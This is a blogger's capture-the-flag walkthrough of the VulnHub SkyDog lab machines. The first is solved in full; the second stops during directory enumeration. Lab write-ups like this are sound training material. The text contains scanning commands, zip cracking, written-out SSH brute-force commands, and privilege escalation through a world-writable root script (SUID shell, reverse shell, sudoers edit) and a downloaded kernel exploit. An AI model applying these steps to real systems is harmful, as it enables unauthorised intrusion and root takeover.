AAKASH CHOUDHARY

Hi friends, I am CodeNinja a.k.a. Aakash Choudhary, and today I solved another machine, the SkyDog CTF VulnHub machine, which is the 1st machine in a series of 2. And guess what? I did 90% of it myself this time.

I learned a lot from this machine.
You can download this vulnhub machine from here -> https://www.vulnhub.com/entry/skydog-1,142/

So, let's start the writeup.
===================================================================

ATTACKING IP: 192.168.56.130
VICTIM IP: 192.168.56.131


First, starting with my KeepNote screenshot




=================================================================

OK, so I divide this section into ->


  1. FLAG 1
  2. FLAG 2
  3. FLAG 3
  4. FLAG 4
  5. FLAG 5
  6. FLAG 6
=================================================================

First let's see the flag INSTRUCTIONS
=================================================================
Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.


Flags

The six flags are in the form of flag{MD5 Hash} such as
      flag{1a79a4d60de6718e8e5b326e338ae533}

  1. Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
  2. Flag #2 When do Androids Learn to Walk?
  3. Flag #3 Who Can You Trust?
  4. Flag #4 Who Doesn't Love a Good Cocktail  Party?
  5. Flag #5 Another Day at the Office
  6. Flag #6 Little Black Box


===================================================================


Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

First, start with netdiscover and arp-scan to get host info

netdiscover -r 192.168.56.0/24


I got the IP -> 192.168.56.131
The next step is to get the MAC ADDRESS

arp-scan -l
 



So we got MAC ADDRESS ->

00:0c:29:30:9d:9b

MASSCAN

masscan --interface eth0 --router-mac 00-0c-29-30-9d-9b --wait 30 --rate 100000 -p0-65535 192.168.56.131

Result --->

Discovered open port 22/tcp on 192.168.56.131                
Discovered open port 80/tcp on 192.168.56.131

Now NMAP to get more info about PORTS

NMAP

nmap -A -sV -sS -p80,22 192.168.56.131



OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

So ports 80 and 22 are open, which are HTTP and SSH respectively

I noted this down in my KeepNote

As HTTP is open, first start by browsing the website

When I opened it I saw this




OK, let's look at the source code, comments, robots.txt, and brute-force directories. These are the usual basic steps while pentesting, as ENUMERATION, ENUMERATION and ENUMERATION is essential for every pentester to get more information about the TARGET


Also, as that web page has an image file, just save that file and then examine it with the exiftool command




We got our first Flag


flag{abc40a2d4e023b42bd1ff04891549ae2}  -> Welcome Home
I cracked that using online decoding


Flag #2 When do Androids Learn to Walk?

Androids, hmm, maybe directories about androids. Let's check directories

First, using nikto



Second, I checked robots.txt



Got the 2nd flag in robots.txt

 flag{cd4f10fcba234f0e8b2f60a490c306e6} --->  Bots


Flag #3 Who Can You Trust?

Trust? Hmm, let's figure it out
Trust can be related to security

In security there is one rule: "Never trust any form of input, whether it is client-side or server-side"


I checked this -> /Setec/ directory ---> http://192.168.56.131/Setec/



TOO MANY SECRETS

Hmm, OK
Let's check its source code
view-source:http://192.168.56.131/Setec/


In terms of trust I got this


Now I got this from the above source code

Got the http://192.168.56.131/Setec/Astronomy/ directory

I noted it down and checked it





I downloaded the Whistler.zip file and checked it



Password? Hmm, I don't know the password. Let's figure it out. I tried everything I had found so far as the password but failed. Then using Google I got to know a password cracker for zip files -> fcrackzip

First I ran man fcrackzip to learn about it



Then I used it after understanding it






OK, we got our 3rd FLAG :D


  • flag{1871a3c1da602bf471d3d76cc60cdb9b} --> yourmother


Flag #4 Who Doesn't Love a Good Cocktail Party?


Cocktail Party, hmm

Remember that Whistler.zip file? Other than the flag.txt file there was another file -> QuesttoFindCosmo.txt

Now I read the QuesttoFindCosmo.txt file

cat QuesttoFindCosmo.txt 
Time to break out those binoculars and start doing some OSINT
So it is talking about OSINT

Now the really interesting part comes.

OSINT, so that means we have to gather information from outside sources

I checked my notes again and got this from the source code of
    • http://192.168.56.131/Setec/

"NSA-Agent-Abbott"; AKA Darth Vader

Let's Google this



I got this result ---->


After reading it I got this --->

1992 Sneakers NSA Agent Bernard Abbott

Oooohhh, Sneakers

So now it's time to get more information from that movie, Sneakers

I Googled again for
  • "sneakers john earl jones coktail party"

Then I got this ->
www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt

http://www.imdb.com/title/tt0105435/trivia


OK, now what to do?

Maybe generate wordlists from those two resources
I Googled this ->

List of Kali Linux tools to generate wordlists, and I got to know about

cewl and crunch

Reading the crunch tutorial was not so promising for me,

so I chose cewl. Now how to use it? Using the man command of course


First, using the man command I got to know about cewl

CeWL  (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as  John the Ripper. Optionally, CeWL can follow external links.

CeWL  can  also create a list of email addresses found in mailto links. These email addresses can be used as usernames in brute force actions


cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia -w /root/Desktop/wordlists/imdb_skydog_wordlist_snickers.txt


When I used that command there was a very, very, very long wait and no response

Then I used the 2nd command and got a quick response

cewl --depth 1 www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt -w /root/Desktop/wordlists/script_skydog_wordlist_snickers.txt


Now after getting the results I was confused about what to do with these wordlists

What to brute-force now? We have no login details so far and I already cracked the zip file, so what to do now?

Then a thought came to my mind: why not brute-force for more directories? Maybe we get another secret revealed?

So let's use dirb again


OK, now what?

Just check that new directory


Now that directory --> 192.168.56.131/PlayTronics/ has two things

1. companytraffic.pcap file
2. flag.txt


Now we got these two items in that directory

one is the FLAG and one is companytraffic.pcap

I checked the flag and got our 4th flag

cat flag.txt


  • flag{c07908a705c22922e6d416e0e1107d99}
After decoding with an online hash cracker it becomes -->
  • flag{c07908a705c22922e6d416e0e1107d99} -> leroybrown


OK, now I noted this "leroybrown" in my KeepNote

Now it's time for the 5th flag :D


Flag #5 Another Day at the Office
 


Now I read that pcap file ---> companytraffic.pcap

I know I can use Wireshark to read a pcap file, but as a pentester, or call it researcher, we always get this tip ->

"We should know various ways to do the same task"

Like there are tcpdump, tcpick and tshark too for the same task

So I Googled now -> various ways to read a pcap file

I got many results like ->

https://github.com/caesar0301/awesome-pcaptools

http://bikulov.org/blog/2012/11/03/tools-for-tracing-a-pcap-file-in-linux-bash/

https://www.blackbytes.info/2012/01/four-ways-to-extract-files-from-pcaps/

http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html

I learned so many new things while reading the above resources

I downloaded chaosreader and used it

First, about Chaosreader -->







Now just open that pcap file in Wireshark and figure it out


Then FOLLOW TCP STREAM


I got this interesting thing ->


GET /8Q3zbtBpxOHb.128.mp3?

An mp3 file. So does it contain a clue or hint for the next step? Yes. Let's download it

Now how to download it? There is a way for this, just see this

Click on -> File -> Export Objects -> HTTP

and then I saved that mp3 file as audio.mp3

OK, now let's listen to it

It's saying this

Hi, my name is Werner Brandes. My voice is my password. Verify me.

So I Googled this and got this YouTube video

https://www.youtube.com/watch?v=-zVgWpVXb64

So what I did is just save that name

Also in that video that person is using Werner Brandes' voice to access something


Now I thought, what to do with this? So I checked my notes to get more clues, maybe I am missing something..

I just checked my user details and then thought, as I have got many user names, why not try to use these usernames to connect over SSH?
Should I also use that Werner Brandes to connect to SSH? Maybe

Then I made a usernames.txt file and a password.txt file and used three tools to crack the SSH login information
Though I had a clue about that name werner brandes, I still made those files

1. First hydra

2. Second msfconsole -> ssh login module

3. Patator, and I've loved it since I got to know about it


Before using these 3 tools I am first sharing my usernames list here, which I saved as password.txt as well
Meaning both files have the same entries





Hydra


MSFCONSOLE






So we got ->
    username -> wernerbrandes
    password ->  leroybrown

Now let's do the same SSH cracking using patator

PATATOR

patator ssh_login host=192.168.56.131 user=FILE0 0=/root/Desktop/wordlists/usernames.txt password=FILE1 1=/root/Desktop/wordlists/passwords.txt --max-retries 0  -x ignore:time=0-3



REALLY, patator is very awesome and I am liking it very much

so wernerbrandes:leroybrown is the username and password

In future I will surely make a script to get clean output from patator results, and Google is the main source for this


Now let's use SSH to connect


password -> leroybrown
Awesome, we got in :D



Awesome, we got our 5th FLAG -->

flag{82ce8d8f5745ff6849fa7af1473c9b35}

After decoding --->  Dr. Gunter Janek


Flag #6 Little Black Box
 

Black box? Does it mean black-box type testing? Meaning more enumeration. Just take time in privilege escalation

PRIVILEGE ESCALATION 

Now using cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash

nemo, another home user, hmm
Then first check the /var/www/html directory

And a very important thing I got ->



CongratulationsYouDidIt  <---- wow, got it, maybe the flag is there?
No, but there is an mp4 file ---->



So I tried a lot of times to download that file and at last I finally succeeded



This is nothing, just a Karate Kid movie mp4 video file

I wrote a C file for an exploit [all right, all right, I have a privilege escalation text file and there is a little script for that purpose]

When I went to save it an error came which was related to writable.

Meaning we now have to find a writable path

FIND WRITABLE PATH 

wernerbrandes@skydogctf:/$ find / -writable -type f 2>/dev/null | more

/lib/log/sanitizer.py
/proc/sys/kernel/ns_last_pid
/proc/1/task/1/attr/current
/proc/1/task/1/attr/exec
/proc/1/task/1/attr/fscreate
/proc/1/task/1/attr/keycreate
/proc/1/task/1/attr/sockcreate
/proc/1/attr/current
/proc/1/attr/exec
/proc/1/attr/fscreate
/proc/1/attr/keycreate
/proc/1/attr/sockcreate
/proc/2/task/2/attr/current
/proc/2/task/2/attr/exec
/proc/2/task/2/attr/fscreate
/proc/2/task/2/attr/keycreate
/proc/2/task/2/attr/sockcreate
/proc/2/attr/current
/proc/2/attr/exec
/proc/2/attr/fscreate
/proc/2/attr/keycreate
/proc/2/attr/sockcreate
/proc/3/task/3/attr/current


FIND <--- this is the command to find files/directories in Kali Linux. And there are many options like type, exec, file, writable etc.

/     <----- This is the root PATH, meaning we are searching for our desired thing from the main root path

-writable <--- we are finding writable paths

-type  <--- type selects which type of file we are looking for, like regular file, symbolic link, executable file etc.

f <--  The type of file we are looking for: REGULAR FILE

2>/dev/null  <-- Without this we get our desired result too, but with many errors like Access Denied. When we use this redirection those Access Denied errors go to /dev/null and we do not see them in the output


NOW
I got a very interesting file  ->  /lib/log/sanitizer.py



So a python file. What is it saying?

It's actually removing files from the tmp directory

Let's check its permissions ->
ls -la /lib/log/sanitizer.py 

-rwxrwxrwx 1 root root 96 Oct 27  2015 /lib/log/sanitizer.py

full permissions   😮

Also, as this file removes tmp files and has full permissions, it is clear that it is owned by root and can be run by root, and this is what we want
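Added audit script, not from the writeup, that does defensively what the find command above does: it walks a tree for regular files that any user can modify (narrower than -writable, which asks whether the current user can write), flags the root-owned executable ones that match the -rwxrwxrwx root root case of /lib/log/sanitizer.py, and prints the chmod that closes the hole. The severity labels, the skipped pseudo-filesystems and the self_check() sample tree are my assumptions; self_check() builds a throwaway directory so the script runs without root.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Pseudo-filesystems that find(1) lists noisily (the /proc/.../attr entries
# above) but that never hold persistent, root-executed scripts. Assumption.
SKIP_DIRS = ("/proc", "/sys", "/dev")


def describe(path: str, st: os.stat_result) -> Dict[str, object]:
    """Summarise the permission facts that matter for a root-run script."""
    mode = st.st_mode
    return {
        "path": path,
        "mode": stat.filemode(mode),  # e.g. -rwxrwxrwx, as ls -la prints it
        "owner_uid": st.st_uid,
        "root_owned": st.st_uid == 0,
        "world_writable": bool(mode & stat.S_IWOTH),
        "group_writable": bool(mode & stat.S_IWGRP),
        "executable": bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
    }


def find_world_writable(root: str) -> List[Dict[str, object]]:
    """Regular files under `root` that every user can modify.

    `find / -writable` asks access(2) whether the *current* user may write,
    so it also lists the user's own files and files granted via group/ACL.
    Here only the other-write bit counts: those files can be hijacked by any
    local account, which is the sanitizer.py problem.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries: what 2>/dev/null hides in the writeup
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                findings.append(describe(path, st))
    return findings


def severity(entry: Dict[str, object]) -> str:
    """Root-owned AND executable world-writable files are the sanitizer.py case."""
    if entry["root_owned"] and entry["executable"]:
        return "critical"
    return "high" if entry["root_owned"] else "medium"


def remediation(entry: Dict[str, object]) -> str:
    """The fix: strip write from group and other, keep ownership as it is."""
    return f"chmod go-w {entry['path']}"


def self_check() -> Dict[str, object]:
    """Build a throwaway tree (one 0777 script, one 0755 script) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "log", "sanitizer.py")   # constructed sample
        good = os.path.join(tmp, "log", "rotate.sh")     # constructed sample
        os.makedirs(os.path.dirname(bad))
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("# constructed placeholder\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        found = find_world_writable(tmp)
        return {
            "flagged": [os.path.basename(e["path"]) for e in found],
            "modes": [e["mode"] for e in found],
            "fixes": [remediation(e) for e in found],
        }


if __name__ == "__main__":
    # Assumption: run on the target host; /lib is where the writeup found the file.
    for entry in find_world_writable("/lib"):
        print(severity(entry), entry["mode"], entry["path"], "->", remediation(entry))
```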



So now let's use this to our advantage for ROOT ACCESS


ROOT ACCESS TIME

So we have to modify that python file so that we gain root access
Google -> using python to get root privileges

So here I Googled a lot and did not get the desired result, so 
Privilege Escalation to get ROOT is the only part where I get stuck many times. 

Let's take help for the first time from writeups

So I will write down every method here which I took from other writeups 


METHOD 1



By changing this path we are giving maximum permissions to /bin/sh

THEN -> 





So finally I cracked it :D

NOTE: you can also use  /bin/dash  in place of /bin/sh

Now time for the 2nd METHOD


METHOD 2

cat /etc/issue && uname -a
Ubuntu 14.04.3 LTS \n \l
Linux skydogctf 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Googling about a 14.04 exploit I got this -> https://www.exploit-db.com/exploits/39166/

I downloaded it using 

wget https://www.exploit-db.com/download/39166/ 
Then


Now we have to transfer this file to the victim machine

For this, First -> 


Then Second ->


Finally we are root again with this simple METHOD   😀


Now time for method 3


METHOD 3

Now in this method we again modify that python script 



Then run the file



Meanwhile run netcat



And we got root :D Impressive

Just Google the python code to understand more.
It just uses a reverse connection


Now it's time for the final method, Method 4, yeaaahhhhhhhh


METHOD 4


Here what I did is add the user wernerbrandes to sudoers so that we gain root access

Then run it and wait for some time

And boom, awesome, we are root again




FROM ALL 4 OF THOSE METHODS WE GOT THE FINAL FLAG :D

  • flag{b70b205c96270be6ced772112e7dd03f}

After decoding it  -->  CongratulationsYouDitIt

So now we have all 6 Flags


EXTRA/Bonus

I also found another way to read a pcap file using Google. And this is what I got -->


https://github.com/DanMcInerney/net-creds


net-creds <-- this can also be used to read a pcap file

I downloaded it using
  • git clone https://github.com/DanMcInerney/net-creds.git
Then

./net-creds.py -p /root/Desktop/pcapfile/companytraffic.pcap 

[192.168.2.223] GET cf-media.sndcdn.com/8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1...

Great, and so simple
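The Wireshark "Follow TCP Stream / Export Objects" step in Flag #5 and the net-creds run here both come down to pulling HTTP request lines out of TCP payloads. Added example, not the writeup's or net-creds' code: a minimal classic-pcap parser that does exactly that, fed a constructed two-frame capture (the request path, host and source address are taken from the writeup's output; the destination address and query string are placeholders).

```python
import struct
from typing import Dict, Iterator, List, Optional, Tuple


def _ip(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame around payload (checksums left 0; parsers ignore them)."""
    eth = bytes.fromhex("000c29000001") + bytes.fromhex("000c29000002") + b"\x08\x00"
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                         _ip(src), _ip(dst))
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip_hdr + tcp_hdr + payload


def build_pcap(frames: List[bytes]) -> bytes:
    """Classic libpcap file: 24-byte global header, then a 16-byte header per record."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def iter_frames(pcap: bytes) -> Iterator[bytes]:
    """Yield the raw link-layer bytes of every record (pcapng is not handled)."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes) -> Optional[Tuple[str, str, bytes]]:
    """Return (src_ip, dst_ip, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":  # EtherType 0x0800 = IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[23] != 6:  # IP protocol 6 = TCP
        return None
    total_len, = struct.unpack_from("!H", frame, 16)
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    tcp_off = 14 + ihl
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return src, dst, frame[tcp_off + data_off:14 + total_len]


def extract_http_requests(pcap: bytes) -> List[Dict[str, str]]:
    """Report every HTTP request line in the capture with its Host and endpoints."""
    requests = []
    for frame in iter_frames(pcap):
        info = tcp_payload(frame)
        if info is None:
            continue
        src, dst, payload = info
        if not payload.startswith((b"GET ", b"POST ", b"HEAD ")):
            continue  # responses and non-HTTP traffic are skipped
        head = payload.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
        method, target = head[0].split(b" ", 2)[:2]
        headers = {}
        for line in head[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        requests.append({
            "src": src, "dst": dst, "method": method.decode(),
            "host": headers.get(b"host", b"").decode(errors="replace"),
            "path": target.decode(errors="replace"),
        })
    return requests


# Constructed sample capture: one request shaped like the one net-creds printed
# (placeholder query string), followed by a response frame that must be ignored.
SAMPLE_PCAP = build_pcap([
    build_frame("192.168.2.223", "203.0.113.10", 49152, 80,
                b"GET /8Q3zbtBpxOHb.128.mp3?Policy=CONSTRUCTED HTTP/1.1\r\n"
                b"Host: cf-media.sndcdn.com\r\nUser-Agent: constructed\r\n\r\n"),
    build_frame("203.0.113.10", "192.168.2.223", 80, 49152,
                b"HTTP/1.1 200 OK\r\nContent-Type: audio/mpeg\r\n\r\nID3"),
])

if __name__ == "__main__":
    for req in extract_http_requests(SAMPLE_PCAP):
        print(f"[{req['src']}] {req['method']} {req['host']}{req['path']}")
```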

SUMMARY OF FLAGS ---> CongratulationsYouDidIt

Thanks for reading. Hope you also learned, as I did

Lastly I want to say thanks to @jamesbower for making such an awesome machine for us so that we learn, and to VulnHub where all the machines are hosted for us so that we learn more and develop skills in penetration testing, and finally thanks to others who post writeups/walkthroughs so that every beginner learns

Thanks 😊

Hello friends, I am CodeNinja a.k.a. Aakash Choudhary. I am learning pentesting by solving VulnHub machines, sometimes by myself and many times by reading other walkthroughs

So, today I did the SKYDOG CTF 2016 VulnHub machine, but I did just 70% myself and the rest with the help of solutions. But the real motive is to learn, and yes, I learned a lot today. Thanks to others who post solutions, and thus I learned a lot

You can download this VulnHub machine from -> SkyDog: 2016 - Catch Me If You Can
OK, so here is my writeup --->

ATTACKING IP : 192.168.56.130
VICTIM IP :  192.168.56.129


First, here is my KeepNote screenshot



==========================================================

OK, so I divide this section into ->


  1. Flag 1
  2. Flag 2
  3. Flag 3
  4. Flag 4
  5. Flag 5
  6. Flag 6
  7. Flag 7
  8. Flag 8

===========================================================

First let's see the FLAGS instructions -->

Flags
The eight flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}
  1. Flag #1 Don’t go Home Frank! There’s a Hex on Your House.
  2. Flag #2 Obscurity or Security?
  3. Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
  4. Flag #4 A Good Agent is Hard to Find.
  5. Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
  6. Flag #6 Where in the World is Frank?
  7. Flag #7 Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!
  8. Flag #8 Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!
===============================================================


1. FLAG 1 :-> Flag #1 Don’t go Home Frank! There’s a Hex on Your House.


First I always use netdiscover and the arp -a command

ABOUT ->

  • NetDiscover is a very neat tool for finding hosts on either wireless or switched networks. It can be used both in active or in passive mode.
  • Using the arp command allows you to display and modify the Address Resolution Protocol (ARP) cache. An ARP cache is a simple mapping of IP addresses to MAC addresses.
I use the arp -a command to get the MAC address, which will be helpful for masscan



NETDISCOVER ->

netdiscover -r 192.168.56.0/24
I got the IP -> 192.168.56.129

OK

The next step is to get the MAC ADDRESS


arp -a
got this ->

mac -> 00:0c:29:87:d2:88 --> 00-0c-29-87-d2-88  [using arp -a]

MASSCAN

masscan -p0-65535 --interface eth0 --wait 30 --rate 10000 --router-mac 00-0c-29-87-d2-88 192.168.56.129


Result ->
Discovered open port 80/tcp on 192.168.56.129                                
Discovered open port 22222/tcp on 192.168.56.129                            
Discovered open port 443/tcp on 192.168.56.129 

Now NMAP to get more information

NMAP

nmap -p80,443,22222 192.168.56.129 -A

Result ->

PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|   256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
|_  256 0e:1b:3f:c3:4a:56:a0:ef:4d:2a:af:a1:7e:94:d2:06 (EdDSA)
MAC Address: 00:0C:29:87:D2:88 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1   --  192.168.56.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.94 seconds


So ports 80, 443 and 22222 are open, which are HTTP, HTTPS & SSH respectively

OK, I noted it down in my KeepNote.

As HTTP is open, first start by browsing the website

When I opened it I saw this





OK, let's look at the source code, comments, robots.txt, and brute-force directories. These are the usual basic steps while pentesting, as ENUMERATION, ENUMERATION and ENUMERATION is essential for every pentester to get more information about the TARGET

First, Source code:
 
view-source:http://192.168.56.129/
<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->


Then I checked  http://192.168.56.129/oldIE/html5.js

/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */

After decoding the HEX using HackBar

 flag{7c0132070a0ef71d542663e9dc1f5dee} 
After decoding on the hashkiller website --->  nmap

So we got our first FLAG :D
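Added example, not from the writeup, showing what the two "decoding" steps above actually do: the JS comment is plain hex of the ASCII flag, and the MD5 inside flag{...} cannot be reversed, so hashkiller (and the "online decoding" used for Flag #1 of the first machine) just looks the digest up against precomputed words. The candidate list is constructed, and the digest checked in the test is the RFC 1321 MD5 test vector for "abc".

```python
import hashlib
import re
from typing import Iterable, Optional

# Matches flag{<md5>}, Flag{...} and flag3{...}, all forms seen in the writeup.
FLAG_RE = re.compile(r"[Ff]lag\d?\{([0-9a-fA-F]{32})\}")


def decode_hex_comment(comment: str) -> str:
    """Decode a hex-encoded ASCII string hidden in a source comment.

    Takes the longest run of hex digits, so the surrounding "/* ... */"
    and whitespace do not matter.
    """
    runs = re.findall(r"[0-9a-fA-F]{8,}", comment)
    if not runs:
        raise ValueError("no hex payload in comment")
    return bytes.fromhex(max(runs, key=len)).decode("ascii")


def extract_md5(text: str) -> Optional[str]:
    """Pull the 32-hex-digit MD5 out of a flag{...} string, lower-cased."""
    m = FLAG_RE.search(text)
    return m.group(1).lower() if m else None


def match_flag(text: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate word whose MD5 equals the flag's digest.

    MD5 is one-way; an "online decoder" is this loop run over a very large
    precomputed list. A short dictionary word is therefore recovered at once,
    which is why hashing a word does not make it a secret.
    """
    digest = extract_md5(text)
    if digest is None:
        return None
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    # The comment from /oldIE/html5.js as quoted in the writeup.
    js_comment = "/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */"
    print(decode_hex_comment(js_comment))
    # Constructed candidate list; "abc" is the RFC 1321 MD5 test vector.
    print(match_flag("flag{900150983cd24fb0d6963f7d28e17f72}", ["nmap", "abc"]))
```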


Now before jumping to FLAG 2 let's use nikto, dirb and dirbuster


NIKTO:

nikto -h 192.168.56.129 

---------------------------------------------------------------------------
+ Target IP:          192.168.56.129
+ Target Hostname:    192.168.56.129
+ Target Port:        80
+ Start Time:         2017-08-18 14:23:18 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x47b5 0x53e97541b87ac
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ 7536 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2017-08-18 14:23:44 (GMT5.5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Nothing important there

DIRB:

dirb http://192.168.56.129 /usr/share/wordlists/dirb/big.txt 


GENERATED WORDS: 20458                                                      

---- Scanning URL: http://192.168.56.129/ ----
+ http://192.168.56.129/404 (CODE:200|SIZE:18360)                                                  
==> DIRECTORY: http://192.168.56.129/assets/                                                        
+ http://192.168.56.129/favicon (CODE:200|SIZE:1150)                                                
+ http://192.168.56.129/favicon.ico (CODE:200|SIZE:1150)                                            
+ http://192.168.56.129/index (CODE:200|SIZE:18357)                                                
+ http://192.168.56.129/personnel (CODE:403|SIZE:131)                                              
+ http://192.168.56.129/rules (CODE:200|SIZE:31156)                                                
+ http://192.168.56.129/server-status (CODE:403|SIZE:302)                                          
                                                                                                   
---- Entering directory: http://192.168.56.129/assets/ ----
